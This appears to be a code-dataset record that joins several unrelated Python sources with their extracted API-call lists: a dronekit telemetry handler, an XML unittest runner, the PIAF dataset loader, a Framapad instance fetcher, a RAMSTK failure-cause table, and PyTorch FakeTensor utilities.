self.handlers[ msg_type ] = handler
def on_message(self, msg):
typ = msg.get_type()
handler = self.handlers.get(typ, None)
if handler is not None:
res, err = handler(msg.data) or (None, None)
# only reply to requests
if msg.verb == Message.REQ:
self.reply(msg, res, err)
else:
print("unknown message of type '%s'" % typ)
def info(self, data):
conf = Config.get()
return ({
"name": conf.name,
"model": conf.model
}, None)
def reply(self, replyTo, result, error):
msg = Message("reply", {
"id": replyTo.id,
"result": result,
"error": error
})
self.send(msg)
def send(self, msg):
if self.gcs is not None:
self.gcs.send_message(msg)
def takeoff(self, cb):
cb("not implemented")
def land(self, cb):
cb("not implemented")
def rtl(self, cb):
cb("not implemented")
def rc(self, roll, pitch, yaw, throttle, gimbal):
pass
def goto(self, lat, lon, relAlt, cb):
cb("not implemented")
def send_status_loop(self):
conf = Config.get()
while True:
pos = self.vehicle.location.global_relative_frame
hdg = self.vehicle.heading
if pos is not None:
self.send(Message("position", {
"lat": pos.lat,
"lon": pos.lon,
"alt": pos.alt,
"relAlt": pos.alt,
"hdg": hdg
}))
#print("Pos: lat: %s, lon: %s, alt: %s" % (pos.lat, pos.lon, pos.alt))
bat = self.vehicle.battery
if bat is not None:
self.send(Message("battery", {
"current": bat.current,
"percent": bat.level,
"voltage": bat.voltage
}))
#print("Battery: current: %s, percent: %s, voltage: %s" % (bat.current, bat.level, bat.voltage))
self.send(Message("status", {
"armed": self.vehicle.armed
}))
time.sleep(conf.status_period) # send every second
|
[
"config.config.Config.get",
"models.message.Message",
"Queue.Queue",
"thread.start_new_thread",
"dronekit.connect",
"time.sleep"
] |
[((549, 562), 'Queue.Queue', 'Queue.Queue', ([], {}), '()\n', (560, 562), False, 'import Queue\n'), ((817, 874), 'dronekit.connect', 'connect', (['self.addr'], {'wait_ready': '(True)', 'heartbeat_timeout': '(15)'}), '(self.addr, wait_ready=True, heartbeat_timeout=15)\n', (824, 874), False, 'from dronekit import connect\n'), ((883, 933), 'thread.start_new_thread', 'thread.start_new_thread', (['self.send_status_loop', '()'], {}), '(self.send_status_loop, ())\n', (906, 933), False, 'import thread\n'), ((1764, 1776), 'config.config.Config.get', 'Config.get', ([], {}), '()\n', (1774, 1776), False, 'from config.config import Config\n'), ((1937, 2007), 'models.message.Message', 'Message', (['"""reply"""', "{'id': replyTo.id, 'result': result, 'error': error}"], {}), "('reply', {'id': replyTo.id, 'result': result, 'error': error})\n", (1944, 2007), False, 'from models.message import Message\n'), ((2531, 2543), 'config.config.Config.get', 'Config.get', ([], {}), '()\n', (2541, 2543), False, 'from config.config import Config\n'), ((3528, 3558), 'time.sleep', 'time.sleep', (['conf.status_period'], {}), '(conf.status_period)\n', (3538, 3558), False, 'import time\n'), ((3435, 3483), 'models.message.Message', 'Message', (['"""status"""', "{'armed': self.vehicle.armed}"], {}), "('status', {'armed': self.vehicle.armed})\n", (3442, 3483), False, 'from models.message import Message\n'), ((2724, 2828), 'models.message.Message', 'Message', (['"""position"""', "{'lat': pos.lat, 'lon': pos.lon, 'alt': pos.alt, 'relAlt': pos.alt, 'hdg': hdg}"], {}), "('position', {'lat': pos.lat, 'lon': pos.lon, 'alt': pos.alt,\n 'relAlt': pos.alt, 'hdg': hdg})\n", (2731, 2828), False, 'from models.message import Message\n'), ((3129, 3223), 'models.message.Message', 'Message', (['"""battery"""', "{'current': bat.current, 'percent': bat.level, 'voltage': bat.voltage}"], {}), "('battery', {'current': bat.current, 'percent': bat.level, 'voltage':\n bat.voltage})\n", (3136, 3223), False, 'from models.message import Message\n')]
|
# -*- coding: utf-8 -*-
"""
This module provides the XMLTestRunner class, which is heavily based on the
default TextTestRunner.
"""
import os
import sys
import time
import codecs
try:
from unittest2.runner import TextTestRunner
from unittest2.runner import TextTestResult as _TextTestResult
from unittest2.result import TestResult
except ImportError:
from unittest import TestResult, _TextTestResult, TextTestRunner
try:
# Removed in Python 3
from cStringIO import StringIO
except ImportError:
from io import StringIO
if sys.version_info[0] >= 3:
unicode=str
class _DelegateIO(object):
"""
This class defines an object that captures whatever is written to
a stream or file.
"""
def __init__(self, delegate):
self._captured = StringIO()
self.delegate = delegate
def write(self, text):
self._captured.write(text)
self.delegate.write(text)
def __getattr__(self, attr):
return getattr(self._captured, attr)
def testcase_name(test_method):
testcase = type(test_method)
# Ignore module name if it is '__main__'
module = testcase.__module__ + '.'
if module == '__main__.':
module = ''
result = module + testcase.__name__
return result
class _TestInfo(object):
"""
This class keeps useful information about the execution of a
test method.
"""
# Possible test outcomes
(SUCCESS, FAILURE, ERROR, SKIP) = range(4)
def __init__(self, test_result, test_method, outcome=SUCCESS, err=None):
self.test_result = test_result
self.test_method = test_method
self.outcome = outcome
self.elapsed_time = 0
self.err = err
self.test_description = self.test_result.getDescription(test_method)
self.test_exception_info = (
'' if outcome in (self.SUCCESS, self.SKIP)
else self.test_result._exc_info_to_string(
self.err, test_method)
)
self.test_name = testcase_name(test_method)
self.test_id = test_method.id()
def id(self):
return self.test_method.id()
def test_finished(self):
"""Save info that can only be calculated once a test has run.
"""
self.elapsed_time = \
self.test_result.stop_time - self.test_result.start_time
def get_description(self):
"""
Return a text representation of the test method.
"""
return self.test_description
def get_error_info(self):
"""
Return a text representation of an exception thrown by a test
method.
"""
return self.test_exception_info
class _XMLTestResult(_TextTestResult):
"""
A test result class that can express test results in a XML report.
Used by XMLTestRunner.
"""
def __init__(self, stream=sys.stderr, descriptions=1, verbosity=1,
elapsed_times=True):
_TextTestResult.__init__(self, stream, descriptions, verbosity)
self.successes = []
self.skipped=[]
self.callback = None
self.elapsed_times = elapsed_times
def _prepare_callback(self, test_info, target_list, verbose_str,
short_str):
"""
Appends a _TestInfo to the given target list and sets a callback
method to be called by stopTest method.
"""
target_list.append(test_info)
def callback():
"""Prints the test method outcome to the stream, as well as
the elapsed time.
"""
test_info.test_finished()
# Ignore the elapsed times for a more reliable unit testing
if not self.elapsed_times:
self.start_time = self.stop_time = 0
if self.showAll:
self.stream.writeln(
'%s (%.3fs)' % (verbose_str, test_info.elapsed_time)
)
elif self.dots:
self.stream.write(short_str)
self.callback = callback
def startTest(self, test):
"""
Called before execute each test method.
"""
self.start_time = time.time()
TestResult.startTest(self, test)
if self.showAll:
self.stream.write(' ' + self.getDescription(test))
self.stream.write(" ... ")
def stopTest(self, test):
"""
Called after execute each test method.
"""
_TextTestResult.stopTest(self, test)
self.stop_time = time.time()
if self.callback and callable(self.callback):
self.callback()
self.callback = None
def addSuccess(self, test):
"""
Called when a test executes successfully.
"""
self._prepare_callback(
_TestInfo(self, test), self.successes, 'OK', '.'
)
def addFailure(self, test, err):
"""
Called when a test method fails.
"""
testinfo = _TestInfo(self, test, _TestInfo.ERROR, err)
self.errors.append((
testinfo,
self._exc_info_to_string(err, test)
))
self._prepare_callback(testinfo, [], 'FAIL', 'F')
def addError(self, test, err):
"""
Called when a test method raises an error.
"""
testinfo = _TestInfo(self, test, _TestInfo.ERROR, err)
self.errors.append((
testinfo,
self._exc_info_to_string(err, test)
))
self._prepare_callback(testinfo, [], 'ERROR', 'E')
def addSkip(self, test, reason):
"""
Called when a test method was skipped.
"""
testinfo = _TestInfo(self, test, _TestInfo.SKIP, reason)
self.skipped.append((testinfo, reason))
self._prepare_callback(testinfo, [], 'SKIP', 'S')
def printErrorList(self, flavour, errors):
"""
Writes information about the FAIL or ERROR to the stream.
"""
for test_info, error in errors:
self.stream.writeln(self.separator1)
self.stream.writeln(
'%s [%.3fs]: %s' % (flavour, test_info.elapsed_time,
test_info.get_description())
)
self.stream.writeln(self.separator2)
self.stream.writeln('%s' % test_info.get_error_info())
def _get_info_by_testcase(self, outsuffix):
"""
Organizes test results by TestCase module. This information is
used during the report generation, where a XML report will be created
for each TestCase.
"""
tests_by_testcase = {}
for tests in (self.successes, self.failures, self.errors, self.skipped):
for test_info in tests:
if isinstance(test_info, tuple):
# This is a skipped, error or a failure test case
test_info = test_info[0]
testcase_name = test_info.test_name
if not testcase_name in tests_by_testcase:
tests_by_testcase[testcase_name] = []
tests_by_testcase[testcase_name].append(test_info)
return tests_by_testcase
def _report_testsuite(suite_name, outsuffix, tests, testsuites, xml_document):
"""
Appends the testsuite section to the XML document.
"""
testsuite = xml_document.createElement('testsuite')
testsuites.appendChild(testsuite)
testsuite.setAttribute('name', "%s-%s" % (suite_name, outsuffix))
testsuite.setAttribute('tests', str(len(tests)))
testsuite.setAttribute(
'time', '%.3f' % sum(map(lambda e: e.elapsed_time, tests))
)
failures = filter(lambda e: e.outcome == _TestInfo.FAILURE, tests)
testsuite.setAttribute('failures', str(len(list(failures))))
errors = filter(lambda e: e.outcome == _TestInfo.ERROR, tests)
testsuite.setAttribute('errors', str(len(list(errors))))
return testsuite
_report_testsuite = staticmethod(_report_testsuite)
def _test_method_name(test_id):
"""
Returns the test method name.
"""
return test_id.split('.')[-1]
_test_method_name = staticmethod(_test_method_name)
def _report_testcase(suite_name, test_result, xml_testsuite, xml_document):
"""
Appends a testcase section to the XML document.
"""
testcase = xml_document.createElement('testcase')
xml_testsuite.appendChild(testcase)
testcase.setAttribute(
'name', '%s.%s'%(suite_name,_XMLTestResult._test_method_name(test_result.test_id))
)
testcase.setAttribute('time', '%.3f' % test_result.elapsed_time)
status='pass'
if (test_result.outcome != _TestInfo.SUCCESS):
status = ('failure', 'error', 'skipped')[test_result.outcome - 1]
failure = xml_document.createElement(status)
testcase.appendChild(failure)
if test_result.outcome != _TestInfo.SKIP:
failure.setAttribute('type', test_result.err[0].__name__)
failure.setAttribute('message', unicode(test_result.err[1])) # don't use str(), breaks on py2
error_info = unicode(test_result.get_error_info())
failureText = xml_document.createCDATASection(error_info)
failure.appendChild(failureText)
else:
failure.setAttribute('type', 'skip')
failure.setAttribute('message', test_result.err)
testcase.setAttribute('status', status)
_report_testcase = staticmethod(_report_testcase)
def _report_output(test_runner, xml_testsuite, xml_document):
"""
Appends the system-out and system-err sections to the XML document.
"""
systemout = xml_document.createElement('system-out')
xml_testsuite.appendChild(systemout)
systemout_text = xml_document.createCDATASection(sys.stdout.getvalue())
systemout.appendChild(systemout_text)
systemerr = xml_document.createElement('system-err')
xml_testsuite.appendChild(systemerr)
systemerr_text = xml_document.createCDATASection(sys.stderr.getvalue())
systemerr.appendChild(systemerr_text)
_report_output = staticmethod(_report_output)
def generate_reports(self, test_runner):
"""
Generates the XML reports to a given XMLTestRunner object.
"""
from xml.dom.minidom import Document
all_results = self._get_info_by_testcase(test_runner.outsuffix)
if (isinstance(test_runner.output, str) and not
os.path.exists(test_runner.output)):
os.makedirs(test_runner.output)
doc = Document()
testsuites = doc.createElement('testsuites')
doc.appendChild(testsuites)
nbTestCases=0
nbTestErrors=0
nbTestFailures=0
timeAllTests=0
for suite, tests in all_results.items():
# Build the XML file
testsuite = _XMLTestResult._report_testsuite(
suite, test_runner.outsuffix, tests, testsuites, doc
)
for test in tests:
_XMLTestResult._report_testcase(suite, test, testsuite, doc)
nbTestCases=nbTestCases+1
if test.outcome==_TestInfo.ERROR:
nbTestErrors+=1
if test.outcome==_TestInfo.FAILURE:
nbTestFailures+=1
timeAllTests=test.elapsed_time
testsuites.setAttribute("tests","%s"%nbTestCases)
testsuites.setAttribute("failures","%s"%nbTestFailures)
testsuites.setAttribute("errors","%s"%nbTestErrors)
testsuites.setAttribute("time","%s"%timeAllTests)
_XMLTestResult._report_output(test_runner, testsuite, doc)
xml_content = doc.toprettyxml(indent='\t')
try:
# python>2.7
xml_content = xml_content.decode('utf-8',errors='replace')
except:
# python2.6
xml_content = xml_content.decode('utf-8','replace')
report_file = codecs.open(
'%s%s%s' % (
test_runner.output, os.sep,
test_runner.outsuffix
), 'w', 'utf-8')
report_file.write(xml_content)
report_file.close()
class XMLTestRunner(TextTestRunner):
"""
A test runner class that outputs the results in JUnit like XML files.
"""
def __init__(self, output='.', outsuffix=None, stream=sys.stderr,
descriptions=True, verbosity=1, elapsed_times=True):
TextTestRunner.__init__(self, stream, descriptions, verbosity)
self.verbosity = verbosity
self.output = output
if outsuffix:
self.outsuffix = outsuffix
else:
self.outsuffix = time.strftime("%Y%m%d%H%M%S")
self.elapsed_times = elapsed_times
def _make_result(self):
"""
Creates a TestResult object which will be used to store
information about the executed tests.
"""
return _XMLTestResult(
self.stream, self.descriptions, self.verbosity, self.elapsed_times
)
def _patch_standard_output(self):
"""
Replaces stdout and stderr streams with string-based streams
in order to capture the tests' output.
"""
sys.stdout = _DelegateIO(sys.stdout)
sys.stderr = _DelegateIO(sys.stderr)
def _restore_standard_output(self):
"""
Restores stdout and stderr streams.
"""
sys.stdout = sys.stdout.delegate
sys.stderr = sys.stderr.delegate
def run(self, test):
"""
Runs the given test case or test suite.
"""
try:
# Prepare the test execution
self._patch_standard_output()
result = self._make_result()
# Print a nice header
self.stream.writeln()
self.stream.writeln('Running tests...')
self.stream.writeln(result.separator2)
# Execute tests
start_time = time.time()
test(result)
stop_time = time.time()
time_taken = stop_time - start_time
# Print results
result.printErrors()
self.stream.writeln(result.separator2)
run = result.testsRun
self.stream.writeln("Ran %d test%s in %.3fs" % (
run, run != 1 and "s" or "", time_taken)
)
self.stream.writeln()
expectedFails = unexpectedSuccesses = skipped = 0
try:
results = map(len, (result.expectedFailures,
result.unexpectedSuccesses,
result.skipped))
except AttributeError:
pass
else:
expectedFails, unexpectedSuccesses, skipped = results
# Error traces
infos = []
if not result.wasSuccessful():
self.stream.write("FAILED")
failed, errored = map(len, (result.failures, result.errors))
if failed:
infos.append("failures={0}".format(failed))
if errored:
infos.append("errors={0}".format(errored))
else:
self.stream.write("OK")
if skipped:
infos.append("skipped={0}".format(skipped))
if expectedFails:
infos.append("expected failures={0}".format(expectedFails))
if unexpectedSuccesses:
infos.append("unexpected successes={0}".format(unexpectedSuccesses))
if infos:
self.stream.writeln(" ({0})".format(", ".join(infos)))
else:
self.stream.write("\n")
# Generate reports
self.stream.writeln()
self.stream.writeln('Generating XML reports...')
result.generate_reports(self)
finally:
self._restore_standard_output()
return result
|
[
"xml.dom.minidom.Document",
"io.StringIO",
"unittest.TestResult.startTest",
"codecs.open",
"os.makedirs",
"unittest.TextTestRunner.__init__",
"sys.stderr.getvalue",
"os.path.exists",
"time.strftime",
"unittest._TextTestResult.__init__",
"time.time",
"unittest._TextTestResult.stopTest",
"sys.stdout.getvalue"
] |
[((791, 801), 'io.StringIO', 'StringIO', ([], {}), '()\n', (799, 801), False, 'from io import StringIO\n'), ((2955, 3018), 'unittest._TextTestResult.__init__', '_TextTestResult.__init__', (['self', 'stream', 'descriptions', 'verbosity'], {}), '(self, stream, descriptions, verbosity)\n', (2979, 3018), False, 'from unittest import TestResult, _TextTestResult, TextTestRunner\n'), ((4175, 4186), 'time.time', 'time.time', ([], {}), '()\n', (4184, 4186), False, 'import time\n'), ((4195, 4227), 'unittest.TestResult.startTest', 'TestResult.startTest', (['self', 'test'], {}), '(self, test)\n', (4215, 4227), False, 'from unittest import TestResult, _TextTestResult, TextTestRunner\n'), ((4467, 4503), 'unittest._TextTestResult.stopTest', '_TextTestResult.stopTest', (['self', 'test'], {}), '(self, test)\n', (4491, 4503), False, 'from unittest import TestResult, _TextTestResult, TextTestRunner\n'), ((4529, 4540), 'time.time', 'time.time', ([], {}), '()\n', (4538, 4540), False, 'import time\n'), ((10756, 10766), 'xml.dom.minidom.Document', 'Document', ([], {}), '()\n', (10764, 10766), False, 'from xml.dom.minidom import Document\n'), ((12159, 12252), 'codecs.open', 'codecs.open', (["('%s%s%s' % (test_runner.output, os.sep, test_runner.outsuffix))", '"""w"""', '"""utf-8"""'], {}), "('%s%s%s' % (test_runner.output, os.sep, test_runner.outsuffix),\n 'w', 'utf-8')\n", (12170, 12252), False, 'import codecs\n'), ((12686, 12748), 'unittest.TextTestRunner.__init__', 'TextTestRunner.__init__', (['self', 'stream', 'descriptions', 'verbosity'], {}), '(self, stream, descriptions, verbosity)\n', (12709, 12748), False, 'from unittest import TestResult, _TextTestResult, TextTestRunner\n'), ((9979, 10000), 'sys.stdout.getvalue', 'sys.stdout.getvalue', ([], {}), '()\n', (9998, 10000), False, 'import sys\n'), ((10213, 10234), 'sys.stderr.getvalue', 'sys.stderr.getvalue', ([], {}), '()\n', (10232, 10234), False, 'import sys\n'), ((10709, 10740), 'os.makedirs', 'os.makedirs', (['test_runner.output'], {}), '(test_runner.output)\n', (10720, 10740), False, 'import os\n'), ((12917, 12946), 'time.strftime', 'time.strftime', (['"""%Y%m%d%H%M%S"""'], {}), "('%Y%m%d%H%M%S')\n", (12930, 12946), False, 'import time\n'), ((14194, 14205), 'time.time', 'time.time', ([], {}), '()\n', (14203, 14205), False, 'import time\n'), ((14255, 14266), 'time.time', 'time.time', ([], {}), '()\n', (14264, 14266), False, 'import time\n'), ((10660, 10694), 'os.path.exists', 'os.path.exists', (['test_runner.output'], {}), '(test_runner.output)\n', (10674, 10694), False, 'import os\n')]
|
# coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""PIAF Question Answering Dataset"""
from __future__ import absolute_import, division, print_function
import json
import logging
import datasets
_CITATION = """\
@InProceedings{keraron-EtAl:2020:LREC,
author = {<NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME>},
title = {Project PIAF: Building a Native French Question-Answering Dataset},
booktitle = {Proceedings of The 12th Language Resources and Evaluation Conference},
month = {May},
year = {2020},
address = {Marseille, France},
publisher = {European Language Resources Association},
pages = {5483--5492},
abstract = {Motivated by the lack of data for non-English languages, in particular for the evaluation of downstream tasks such as Question Answering, we present a participatory effort to collect a native French Question Answering Dataset. Furthermore, we describe and publicly release the annotation tool developed for our collection effort, along with the data obtained and preliminary baselines.},
url = {https://www.aclweb.org/anthology/2020.lrec-1.673}
}
"""
_DESCRIPTION = """\
Piaf is a reading comprehension \
dataset. This version, published in February 2020, contains 3835 questions on French Wikipedia.
"""
_URLS = {"train": "https://github.com/etalab-ia/piaf-code/raw/master/piaf-v1.0.json"}
class PiafConfig(datasets.BuilderConfig):
"""BuilderConfig for PIAF."""
def __init__(self, **kwargs):
"""BuilderConfig for PIAF.
Args:
**kwargs: keyword arguments forwarded to super.
"""
super(PiafConfig, self).__init__(**kwargs)
class Piaf(datasets.GeneratorBasedBuilder):
"""The Piaf Question Answering Dataset. Version 1.0."""
BUILDER_CONFIGS = [
PiafConfig(
name="plain_text",
version=datasets.Version("1.0.0", ""),
description="Plain text",
),
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"id": datasets.Value("string"),
"title": datasets.Value("string"),
"context": datasets.Value("string"),
"question": datasets.Value("string"),
"answers": datasets.features.Sequence(
{
"text": datasets.Value("string"),
"answer_start": datasets.Value("int32"),
}
),
}
),
# No default supervised_keys (as we have to pass both question
# and context as input).
supervised_keys=None,
homepage="https://piaf.etalab.studio",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
urls_to_download = _URLS
downloaded_files = dl_manager.download_and_extract(urls_to_download)
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"filepath": downloaded_files["train"]}),
]
def _generate_examples(self, filepath):
"""This function returns the examples in the raw (text) form."""
logging.info("generating examples from = %s", filepath)
with open(filepath, encoding="utf-8") as f:
dataset = json.load(f)
for article in dataset["data"]:
title = article.get("title", "").strip()
for paragraph in article["paragraphs"]:
context = paragraph["context"].strip()
for qa in paragraph["qas"]:
question = qa["question"].strip()
id_ = qa["id"]
answer_starts = [answer["answer_start"] for answer in qa["answers"]]
answers = [answer["text"].strip() for answer in qa["answers"]]
# Features currently used are "context", "question", and "answers".
# Others are extracted here for the ease of future expansions.
yield id_, {
"title": title,
"context": context,
"question": question,
"id": id_,
"answers": {
"answer_start": answer_starts,
"text": answers,
},
}
|
[
"json.load",
"datasets.SplitGenerator",
"datasets.Value",
"logging.info",
"datasets.Version"
] |
[((3975, 4030), 'logging.info', 'logging.info', (['"""generating examples from = %s"""', 'filepath'], {}), "('generating examples from = %s', filepath)\n", (3987, 4030), False, 'import logging\n'), ((3735, 3841), 'datasets.SplitGenerator', 'datasets.SplitGenerator', ([], {'name': 'datasets.Split.TRAIN', 'gen_kwargs': "{'filepath': downloaded_files['train']}"}), "(name=datasets.Split.TRAIN, gen_kwargs={'filepath':\n downloaded_files['train']})\n", (3758, 3841), False, 'import datasets\n'), ((4105, 4117), 'json.load', 'json.load', (['f'], {}), '(f)\n', (4114, 4117), False, 'import json\n'), ((2549, 2578), 'datasets.Version', 'datasets.Version', (['"""1.0.0"""', '""""""'], {}), "('1.0.0', '')\n", (2565, 2578), False, 'import datasets\n'), ((2816, 2840), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (2830, 2840), False, 'import datasets\n'), ((2871, 2895), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (2885, 2895), False, 'import datasets\n'), ((2928, 2952), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (2942, 2952), False, 'import datasets\n'), ((2986, 3010), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (3000, 3010), False, 'import datasets\n'), ((3133, 3157), 'datasets.Value', 'datasets.Value', (['"""string"""'], {}), "('string')\n", (3147, 3157), False, 'import datasets\n'), ((3203, 3226), 'datasets.Value', 'datasets.Value', (['"""int32"""'], {}), "('int32')\n", (3217, 3226), False, 'import datasets\n')]
|
#!/usr/bin/env python3
import json
import yaml
try:
from urllib import request
except ImportError:
import urllib2 as request
with request.urlopen("https://framagit.org/framasoft/framapad/-/raw/master/app/data/project.yml?inline=false") as stream:
#with open("project.yml", 'r') as stream:
data_loaded = yaml.safe_load(stream)
data = data_loaded['instances']
with open('js/instances.js', 'w') as outfile:
outfile.write("const instances = ")
json.dump(data, outfile)
outfile.write(";")
|
[
"json.dump",
"yaml.safe_load",
"urllib2.urlopen"
] |
[((140, 255), 'urllib2.urlopen', 'request.urlopen', (['"""https://framagit.org/framasoft/framapad/-/raw/master/app/data/project.yml?inline=false"""'], {}), "(\n 'https://framagit.org/framasoft/framapad/-/raw/master/app/data/project.yml?inline=false'\n )\n", (155, 255), True, 'import urllib2 as request\n'), ((321, 343), 'yaml.safe_load', 'yaml.safe_load', (['stream'], {}), '(stream)\n', (335, 343), False, 'import yaml\n'), ((482, 506), 'json.dump', 'json.dump', (['data', 'outfile'], {}), '(data, outfile)\n', (491, 506), False, 'import json\n')]
|
# -*- coding: utf-8 -*-
#
# ramstk.models.programdb.cause.table.py is part of The RAMSTK Project
#
# All rights reserved.
# Copyright since 2007 Doyle "weibullguy" Rowland doyle.rowland <AT> reliaqual <DOT> com
"""Failure Cause Package Data Controller."""
# Standard Library Imports
from typing import Any, Dict, Type
# Third Party Imports
from pubsub import pub
# RAMSTK Package Imports
from ramstk.analyses import criticality
from ramstk.models import RAMSTKBaseTable, RAMSTKCauseRecord
class RAMSTKCauseTable(RAMSTKBaseTable):
"""Contain the attributes and methods of the Cause data manager."""
# Define private dictionary class attributes.
# Define private list class attributes.
# Define private scalar class attributes.
_db_id_colname = "fld_cause_id"
_db_tablename = "ramstk_cause"
_select_msg = "selected_revision"
_tag = "cause"
# Define public dictionary class attributes.
# Define public list class attributes.
# Define public scalar class attributes.
def __init__(self, **kwargs: Dict[str, Any]) -> None:
"""Initialize a Cause data manager instance."""
super().__init__(**kwargs)
# Initialize private dictionary attributes.
# Initialize private list attributes.
self._lst_id_columns = [
"revision_id",
"hardware_id",
"mode_id",
"mechanism_id",
"cause_id",
]
# Initialize private scalar attributes.
self._record: Type[RAMSTKCauseRecord] = RAMSTKCauseRecord
# Initialize public dictionary attributes.
# Initialize public list attributes.
# Initialize public scalar attributes.
self.pkey = "cause_id"
# Subscribe to PyPubSub messages.
pub.subscribe(self.do_calculate_rpn, "request_calculate_cause_rpn")
def do_get_new_record( # pylint: disable=method-hidden
self, attributes: Dict[str, Any]
) -> object:
"""Gets a new record instance with attributes set.
:param attributes: the dict of attribute values to assign to the new record.
:return: None
:rtype: None
"""
_new_record = self._record()
_new_record.revision_id = attributes["revision_id"]
_new_record.hardware_id = attributes["hardware_id"]
_new_record.mode_id = attributes["mode_id"]
_new_record.mechanism_id = attributes["mechanism_id"]
_new_record.cause_id = self.last_id + 1
_new_record.parent_id = attributes["mechanism_id"]
return _new_record
def do_calculate_rpn(self, severity: int) -> None:
"""Calculate the risk priority number (RPN) of a hardware item's modes.
.. note:: the severity (S) value will always be associated with a
failure mode.
.. note:: the occurrence (O) and detection (D) values may be
associated with a failure mechanism or a failure cause. Typically,
hardware FMEA use mechanisms and functional FMEA use causes.
:param severity: the RPN severity value.
:return: None
:rtype: None
"""
_sod = {"rpn_severity": severity, "rpn_occurrence": 10, "rpn_detection": 10}
for _node in self.tree.all_nodes()[1:]:
_sod["rpn_occurrence"] = _node.data[self._tag].rpn_occurrence
_sod["rpn_detection"] = _node.data[self._tag].rpn_detection
_node.data[self._tag].rpn = criticality.calculate_rpn(_sod)
_sod["rpn_occurrence"] = _node.data[self._tag].rpn_occurrence_new
_sod["rpn_detection"] = _node.data[self._tag].rpn_detection_new
_node.data[self._tag].rpn_new = criticality.calculate_rpn(_sod)
pub.sendMessage(
"succeed_calculate_cause_rpn",
tree=self.tree,
)
|
[
"ramstk.analyses.criticality.calculate_rpn",
"pubsub.pub.subscribe",
"pubsub.pub.sendMessage"
] |
[((1789, 1856), 'pubsub.pub.subscribe', 'pub.subscribe', (['self.do_calculate_rpn', '"""request_calculate_cause_rpn"""'], {}), "(self.do_calculate_rpn, 'request_calculate_cause_rpn')\n", (1802, 1856), False, 'from pubsub import pub\n'), ((3759, 3821), 'pubsub.pub.sendMessage', 'pub.sendMessage', (['"""succeed_calculate_cause_rpn"""'], {'tree': 'self.tree'}), "('succeed_calculate_cause_rpn', tree=self.tree)\n", (3774, 3821), False, 'from pubsub import pub\n'), ((3487, 3518), 'ramstk.analyses.criticality.calculate_rpn', 'criticality.calculate_rpn', (['_sod'], {}), '(_sod)\n', (3512, 3518), False, 'from ramstk.analyses import criticality\n'), ((3718, 3749), 'ramstk.analyses.criticality.calculate_rpn', 'criticality.calculate_rpn', (['_sod'], {}), '(_sod)\n', (3743, 3749), False, 'from ramstk.analyses import criticality\n')]
|
import torch
from torch.utils._pytree import tree_map, tree_flatten
from functools import partial
from torch.fx.operator_schemas import normalize_function
from torch.utils._mode_utils import no_dispatch
from torch._subclasses.meta_utils import MetaConverter
from typing import Union, Callable
from torch._ops import OpOverload
from torch.overrides import TorchFunctionMode
from torch.utils._python_dispatch import TorchDispatchMode, enable_torch_dispatch_mode
import weakref
import functools
import itertools
from dataclasses import dataclass
aten = torch.ops.aten
@dataclass
class UnsupportedFakeTensorException(RuntimeError):
reason: str
@dataclass
class DynamicOutputShapeException(RuntimeError):
func: OpOverload
_device_not_kwarg_ops = (
aten._resize_output_.default,
aten.nested_tensor.default,
aten.pin_memory.default,
aten.is_pinned.default,
aten.to.device,
aten.to.prim_Device,
aten._pin_memory.default,
aten._resize_output.functional,
aten._resize_output.out,
)
# this op is never actually used
_non_kwarg_device_constructors = (torch.ops.aten._list_to_tensor,)
def contains_tensor_types(type):
tensor_type = torch._C.TensorType.get()
return type.isSubtypeOf(tensor_type) or any(
contains_tensor_types(e) for e in type.containedTypes()
)
_like_tensor_constructors = (
aten.empty_like.default,
aten.full_like.default,
aten.ones_like.default,
aten.rand_like.default,
aten.randn_like.default,
aten.randint_like.default,
aten.randint_like.low_dtype,
aten.randn_like.default,
aten.zeros_like.default,
aten.new_empty.default,
aten.new_empty_strided.default,
aten.new_full.default,
aten.new_zeros.default,
aten.new_ones.default,
)
@functools.lru_cache(None)
def _is_tensor_constructor(func: OpOverload):
assert isinstance(func, OpOverload)
schema = func._schema
if any(contains_tensor_types(arg.type) for arg in schema.arguments):
return False
# TODO: no real reason to restrict multiple outputs
return (
len(schema.returns) == 1 and schema.returns[0].type is torch._C.TensorType.get()
)
# Similar to `MetaConverter`, this is a class for converting
# multiple tensors into fake tensors which share the same view/storage
# structure. Like `MetaConverter`, it will keep alive all
# tensors that are converted to FakeTensors.
class FakeTensorConverter(object):
tensor_memo: weakref.WeakValueDictionary
meta_converter: MetaConverter
def __init__(self):
# FakeTensors store the FakeTensorMode which in turn stores a
# FakeTensor, so we need to hold a weak reference to the FakeTensor
# otherwise we would induce a circular reference
self.tensor_memo = weakref.WeakValueDictionary()
self.meta_converter = MetaConverter()
def _get_memo(self, t):
if t in self.tensor_memo:
out = self.tensor_memo[t]
out._fix_weakref()
return out
return None
def from_real_tensor(self, fake_mode, t):
maybe_memo = self._get_memo(t)
if maybe_memo is not None:
return maybe_memo
existing_device = t.device
# not yet supported in metatensors
if t.is_complex():
raise UnsupportedFakeTensorException("complex nyi in meta tensors")
if t.is_sparse:
raise UnsupportedFakeTensorException("sparse nyi in meta tensors")
if t.is_quantized:
raise UnsupportedFakeTensorException("quantized nyi in meta tensors")
with no_dispatch():
out = FakeTensor(fake_mode, self.meta_converter(t), existing_device)
if type(t) is torch.nn.Parameter:
out = torch.nn.Parameter(out, requires_grad=out.requires_grad) # type: ignore[assignment]
self.tensor_memo[t] = out
return out
def from_meta_and_device(self, fake_mode, t, device):
maybe_memo = self._get_memo(t)
if maybe_memo is not None:
return maybe_memo
out = FakeTensor(fake_mode, t, device)
self.tensor_memo[t] = out
return out
